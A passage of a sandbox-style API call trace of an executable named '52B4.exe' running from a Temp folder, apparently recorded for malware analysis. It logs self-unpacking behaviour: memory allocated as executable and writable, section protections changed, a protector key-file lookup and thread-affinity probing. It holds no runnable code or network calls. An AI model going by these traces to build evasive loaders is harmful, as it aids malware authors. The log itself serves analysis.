0x3600000 [0152.541] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.543] GetCurrentProcessId () returned 0xeec [0152.543] GetCurrentProcessId () returned 0xeec [0152.543] GetCurrentProcessId () returned 0xeec [0152.543] GetCurrentProcessId () returned 0xeec [0152.543] GetCurrentProcessId () returned 0xeec [0152.543] GetCurrentProcessId () returned 0xeec [0152.543] GetCurrentProcessId () returned 0xeec [0152.543] GetCurrentProcessId () returned 0xeec [0152.543] GetCurrentProcessId () returned 0xeec [0152.543] GetCurrentProcessId () returned 0xeec [0152.543] GetCurrentProcessId () returned 0xeec [0152.543] GetCurrentProcessId () returned 0xeec [0152.543] GetCurrentProcessId () returned 0xeec [0152.543] GetCurrentProcessId () returned 0xeec [0152.543] GetCurrentProcessId () returned 0xeec [0152.543] GetCurrentProcessId () returned 0xeec [0152.543] GetCurrentProcessId () returned 0xeec [0152.543] GetCurrentProcessId () returned 0xeec [0152.543] GetCurrentProcessId () returned 0xeec [0152.565] ExpandEnvironmentStringsA (in: lpSrc="aspr_keys.ini", lpDst=0x18f6a8, nSize=0x400 | out: lpDst="aspr_keys.ini") returned 0xe [0152.566] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x18f9a8, nSize=0xff | out: lpFilename="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\52B4.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\52b4.exe")) returned 0x2d [0152.566] FindFirstFileA (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\aspr_keys.ini", lpFindFileData=0x18f954 | out: lpFindFileData=0x18f954*(dwFileAttributes=0x2122128, ftCreationTime.dwLowDateTime=0x18fab0, ftCreationTime.dwHighDateTime=0x212214c, ftLastAccessTime.dwLowDateTime=0x2122153, ftLastAccessTime.dwHighDateTime=0x2d, ftLastWriteTime.dwLowDateTime=0x18f9a8, ftLastWriteTime.dwHighDateTime=0x18fac8, nFileSizeHigh=0x230000, nFileSizeLow=0x22092b8, dwReserved0=0x18fed8, dwReserved1=0x21225a2, cFileName="À\x92 \x02¨ù\x18", cAlternateFileName="ü\x92 \x022")) returned 0xffffffff [0152.566] GetTempPathA (in: nBufferLength=0x3ff, lpBuffer=0x18fad0 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25 [0152.566] FindFirstFileA (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\aspr_keys.ini", lpFindFileData=0x18f954 | out: lpFindFileData=0x18f954*(dwFileAttributes=0x230000, ftCreationTime.dwLowDateTime=0x20000000, ftCreationTime.dwHighDateTime=0x247df8, ftLastAccessTime.dwLowDateTime=0x18fa50, ftLastAccessTime.dwHighDateTime=0x77a1389e, ftLastWriteTime.dwLowDateTime=0x230138, ftLastWriteTime.dwHighDateTime=0x77a1387a, nFileSizeHigh=0x77058e50, nFileSizeLow=0x0, dwReserved0=0x230000, dwReserved1=0x247e00, cFileName="¼", cAlternateFileName="\x8cú\x18")) returned 0xffffffff [0152.567] GetCurrentProcessId () returned 0xeec [0152.567] GetCurrentProcessId () returned 0xeec [0152.569] GetCurrentProcessId () returned 0xeec [0152.569] GetCurrentProcessId () returned 0xeec [0152.571] GetCurrentProcessId () returned 0xeec [0152.571] GetCurrentProcessId () returned 0xeec [0152.571] GetCurrentProcessId () returned 0xeec [0152.571] GetCurrentProcessId () returned 0xeec [0152.571] GetCurrentProcessId () returned 0xeec [0152.571] GetCurrentProcessId () returned 0xeec [0152.571] GetCurrentProcessId () returned 0xeec [0152.572] GetCurrentProcessId () returned 0xeec [0152.572] GetCurrentProcessId () returned 0xeec [0152.572] GetCurrentProcessId () returned 0xeec [0152.572] GetCurrentProcessId () returned 0xeec [0152.572] GetCurrentProcessId () returned 0xeec [0152.572] GetCurrentProcessId () returned 0xeec [0152.572] GetCurrentProcessId () returned 0xeec [0152.572] GetCurrentProcessId () returned 0xeec [0152.572] GetCurrentProcessId () returned 0xeec [0152.572] GetCurrentProcessId () returned 0xeec [0152.572] GetCurrentProcessId () returned 0xeec [0152.572] GetCurrentProcessId () returned 0xeec [0152.573] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x3600000 [0152.575] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.576] GetCurrentProcessId () returned 0xeec [0152.576] GetCurrentProcessId () returned 0xeec [0152.576] GetCurrentProcessId () returned 0xeec [0152.576] GetCurrentProcessId () returned 0xeec [0152.576] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x3600000 [0152.578] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.579] GetCurrentProcessId () returned 0xeec [0152.579] GetCurrentProcessId () returned 0xeec [0152.579] GetCurrentProcessId () returned 0xeec [0152.579] GetCurrentProcessId () returned 0xeec [0152.579] GetCurrentProcessId () returned 0xeec [0152.579] GetCurrentProcessId () returned 0xeec [0152.579] GetCurrentProcessId () returned 0xeec [0152.579] GetCurrentProcessId () returned 0xeec [0152.580] GetCurrentProcessId () returned 0xeec [0152.580] GetCurrentProcessId () returned 0xeec [0152.580] GetCurrentProcessId () returned 0xeec [0152.580] GetCurrentProcessId () returned 0xeec [0152.580] GetCurrentProcessId () returned 0xeec [0152.580] GetCurrentProcessId () returned 0xeec [0152.580] GetCurrentProcessId () returned 0xeec [0152.580] GetCurrentProcessId () returned 0xeec [0152.580] GetCurrentProcessId () returned 0xeec [0152.580] GetCurrentProcessId () returned 0xeec [0152.580] GetCurrentProcessId () returned 0xeec [0152.580] GetCurrentProcessId () returned 0xeec [0152.580] GetCurrentProcessId () returned 0xeec [0152.580] GetCurrentProcessId () returned 0xeec [0152.580] GetCurrentProcessId () returned 0xeec [0152.580] GetCurrentProcessId () returned 0xeec [0152.580] GetCurrentProcessId () returned 0xeec [0152.580] GetCurrentProcessId () returned 0xeec [0152.580] GetCurrentProcessId () returned 0xeec [0152.580] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x3600000 [0152.582] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.583] GetCurrentProcessId () returned 0xeec [0152.583] GetCurrentProcessId () returned 0xeec [0152.583] GetCurrentProcessId () returned 0xeec [0152.583] GetCurrentProcessId () returned 0xeec [0152.583] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x3600000 [0152.620] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.622] GetCurrentProcessId () returned 0xeec [0152.622] GetCurrentProcessId () returned 0xeec [0152.622] GetCurrentProcessId () returned 0xeec [0152.622] GetCurrentProcessId () returned 0xeec [0152.622] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x3600000 [0152.624] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.625] GetCurrentProcessId () returned 0xeec [0152.625] GetCurrentProcessId () returned 0xeec [0152.625] GetCurrentProcessId () returned 0xeec [0152.625] GetCurrentProcessId () returned 0xeec [0152.625] GetCurrentProcessId () returned 0xeec [0152.625] GetCurrentProcessId () returned 0xeec [0152.625] GetCurrentProcessId () returned 0xeec [0152.625] GetCurrentProcessId () returned 0xeec [0152.625] GetCurrentProcessId () returned 0xeec [0152.625] GetCurrentProcessId () returned 0xeec [0152.625] GetCurrentProcessId () returned 0xeec [0152.625] VirtualFree (lpAddress=0x2290000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.627] VirtualFree (lpAddress=0x2380000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.630] VirtualFree (lpAddress=0x2820000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.636] VirtualFree (lpAddress=0x28d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.638] VirtualFree (lpAddress=0x2980000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.641] GetCurrentProcessId () returned 0xeec [0152.641] GetCurrentProcessId () returned 0xeec [0152.641] GetCurrentProcessId () returned 0xeec [0152.641] GetCurrentProcessId () returned 0xeec [0152.641] GetCurrentProcessId () returned 0xeec [0152.641] GetCurrentProcessId () returned 0xeec [0152.641] GetCurrentProcessId () returned 0xeec [0152.641] GetCurrentProcessId () returned 0xeec [0152.641] GetCurrentProcessId () returned 0xeec [0152.641] GetCurrentProcessId () returned 0xeec [0152.641] GetCurrentProcessId () returned 0xeec [0152.641] GetCurrentProcessId () returned 0xeec [0152.641] GetCurrentProcessId () returned 0xeec [0152.641] GetCurrentProcessId () returned 0xeec [0152.641] GetCurrentProcessId () returned 0xeec [0152.641] GetCurrentProcessId () returned 0xeec [0152.641] GetCurrentProcessId () returned 0xeec [0152.641] GetCurrentProcessId () returned 0xeec [0152.641] GetCurrentProcessId () returned 0xeec [0152.641] GetCurrentProcessId () returned 0xeec [0152.641] GetCurrentProcessId () returned 0xeec [0152.641] GetCurrentProcessId () returned 0xeec [0152.641] GetCurrentProcessId () returned 0xeec [0152.641] GetCurrentProcessId () returned 0xeec [0152.641] GetCurrentProcessId () returned 0xeec [0152.642] GetCurrentProcessId () returned 0xeec [0152.642] GetCurrentProcessId () returned 0xeec [0152.642] GetCurrentProcessId () returned 0xeec [0152.642] GetCurrentProcessId () returned 0xeec [0152.642] GetCurrentProcessId () returned 0xeec [0152.642] GetCurrentProcessId () returned 0xeec [0152.642] GetCurrentProcessId () returned 0xeec [0152.642] GetCurrentProcessId () returned 0xeec [0152.642] GetCurrentProcessId () returned 0xeec [0152.642] GetCurrentProcessId () returned 0xeec [0152.642] GetCurrentProcessId () returned 0xeec [0152.643] VirtualFree (lpAddress=0x2290000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.647] VirtualFree (lpAddress=0x2290000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.648] VirtualFree (lpAddress=0x2290000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.649] VirtualFree (lpAddress=0x2290000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.650] VirtualFree (lpAddress=0x2290000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.651] VirtualFree (lpAddress=0x2290000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.652] VirtualFree (lpAddress=0x2290000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.661] VirtualFree (lpAddress=0x2290000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.662] VirtualFree (lpAddress=0x2290000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.664] VirtualFree (lpAddress=0x2380000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.666] VirtualFree (lpAddress=0x2380000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.667] VirtualFree (lpAddress=0x2380000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.668] VirtualFree (lpAddress=0x2380000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.668] VirtualFree (lpAddress=0x2380000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.669] VirtualFree (lpAddress=0x2380000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.670] VirtualFree (lpAddress=0x2380000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0153.004] LocalFree (hMem=0x247eb8) returned 0x0 [0153.004] GetProcessAffinityMask (in: hProcess=0xffffffff, lpProcessAffinityMask=0x18feac, lpSystemAffinityMask=0x18fee4 | out: lpProcessAffinityMask=0x18feac, lpSystemAffinityMask=0x18fee4) returned 1 [0153.005] SetThreadAffinityMask (hThread=0xfffffffe, dwThreadAffinityMask=0x1) returned 0x1 [0153.005] Sleep (dwMilliseconds=0x0) [0153.043] SetThreadAffinityMask (hThread=0xfffffffe, dwThreadAffinityMask=0x1) returned 0x1 [0153.043] SetThreadAffinityMask (hThread=0xfffffffe, dwThreadAffinityMask=0x2) returned 0x0 [0153.044] Sleep (dwMilliseconds=0x0) [0153.064] SetThreadAffinityMask (hThread=0xfffffffe, dwThreadAffinityMask=0x0) returned 0x0 [0153.065] SetThreadAffinityMask (hThread=0xfffffffe, dwThreadAffinityMask=0x4) returned 0x0 [0153.065] Sleep (dwMilliseconds=0x0) [0153.066] SetThreadAffinityMask (hThread=0xfffffffe, dwThreadAffinityMask=0x0) returned 0x0 [0153.066] SetThreadAffinityMask (hThread=0xfffffffe, dwThreadAffinityMask=0x8) returned 0x0 [0153.066] Sleep (dwMilliseconds=0x0) [0153.067] SetThreadAffinityMask (hThread=0xfffffffe, dwThreadAffinityMask=0x0) returned 0x0 [0153.068] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x18fac0*=0x47e000, NumberOfBytesToProtect=0x18fab8, NewAccessProtection=0x20, OldAccessProtection=0x18fe00 | out: BaseAddress=0x18fac0*=0x47e000, NumberOfBytesToProtect=0x18fab8, OldAccessProtection=0x18fe00*=0x40) returned 0x0 [0153.074] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x18fac0*=0x46d000, NumberOfBytesToProtect=0x18fab8, NewAccessProtection=0x2, OldAccessProtection=0x18fe00 | out: BaseAddress=0x18fac0*=0x46d000, NumberOfBytesToProtect=0x18fab8, OldAccessProtection=0x18fe00*=0x4) returned 0x0 [0153.076] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x18fac0*=0x401000, NumberOfBytesToProtect=0x18fab8, NewAccessProtection=0x20, OldAccessProtection=0x18fe00 | out: BaseAddress=0x18fac0*=0x401000, NumberOfBytesToProtect=0x18fab8, OldAccessProtection=0x18fe00*=0x40) returned 0x0 [0153.108] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff6c | out: lpSystemTimeAsFileTime=0x18ff6c*(dwLowDateTime=0xd28479e0, dwHighDateTime=0x1d80713)) [0153.108] GetCurrentThreadId () returned 0xef0 [0153.108] GetCurrentProcessId () returned 0xeec [0153.108] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff64 | out: lpPerformanceCount=0x18ff64*=1191706251764) returned 1 [0153.547] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0153.661] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x73550000 [0154.085] GetProcAddress (hModule=0x73550000, lpProcName="InitializeCriticalSectionEx") returned 0x0 [0154.085] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0154.086] GetLastError () returned 0x7e [0154.086] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x769b0000 [0154.087] GetProcAddress (hModule=0x769b0000, lpProcName="FlsAlloc") returned 0x769c4ee3 [0154.125] GetProcAddress (hModule=0x769b0000, lpProcName="FlsSetValue") returned 0x769c41c0 [0154.414] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x73550000 [0154.415] GetProcAddress (hModule=0x73550000, lpProcName="InitializeCriticalSectionEx") returned 0x0 [0154.415] GetProcessHeap () returned 0x230000 [0154.453] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0154.797] GetLastError () returned 0x7e [0154.797] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x769b0000 [0154.798] GetProcAddress (hModule=0x769b0000, lpProcName="FlsAlloc") returned 0x769c4ee3 [0154.798] GetLastError () returned 0x7e [0154.798] GetProcAddress (hModule=0x769b0000, lpProcName="FlsGetValue") returned 0x769c1252 [0154.798] GetProcAddress (hModule=0x769b0000, lpProcName="FlsSetValue") returned 0x769c41c0 [0154.798] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x364) returned 0x2481d0 [0154.824] SetLastError (dwErrCode=0x7e) [0154.910] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0xe00) returned 0x248540 [0154.911] GetStartupInfoW (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\52B4.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x409390, hStdOutput=0xa4397e4a, hStdError=0xfffffffe)) [0154.911] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0154.911] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0154.911] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0154.935] GetCommandLineA () returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\52B4.exe" [0154.935] GetCommandLineW () returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\52B4.exe" [0155.010] GetACP () returned 0x4e4 [0155.010] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x0, Size=0x220) returned 0x247eb8 [0155.010] IsValidCodePage (CodePage=0x4e4) returned 1 [0155.010] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fec4 | out: lpCPInfo=0x18fec4) returned 1 [0155.062] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f78c | out: lpCPInfo=0x18f78c) returned 1 [0155.105] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0155.105] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda0, cbMultiByte=256, lpWideCharStr=0x18f528, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0155.105] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f7a0 | out: lpCharType=0x18f7a0) returned 1 [0155.105] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0155.105] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda0, cbMultiByte=256, lpWideCharStr=0x18f4e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0155.105] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0155.425] GetLastError () returned 0x7e [0155.426] GetProcAddress (hModule=0x769b0000, lpProcName="LCMapStringEx") returned 0x76a44d91 [0155.426] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0155.426] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f2d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0155.426] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x18fca0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÞ/f¤Üþ\x18", lpUsedDefaultChar=0x0) returned 256 [0155.426] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0155.426] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda0, cbMultiByte=256, lpWideCharStr=0x18f4f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0155.426] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0155.426] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 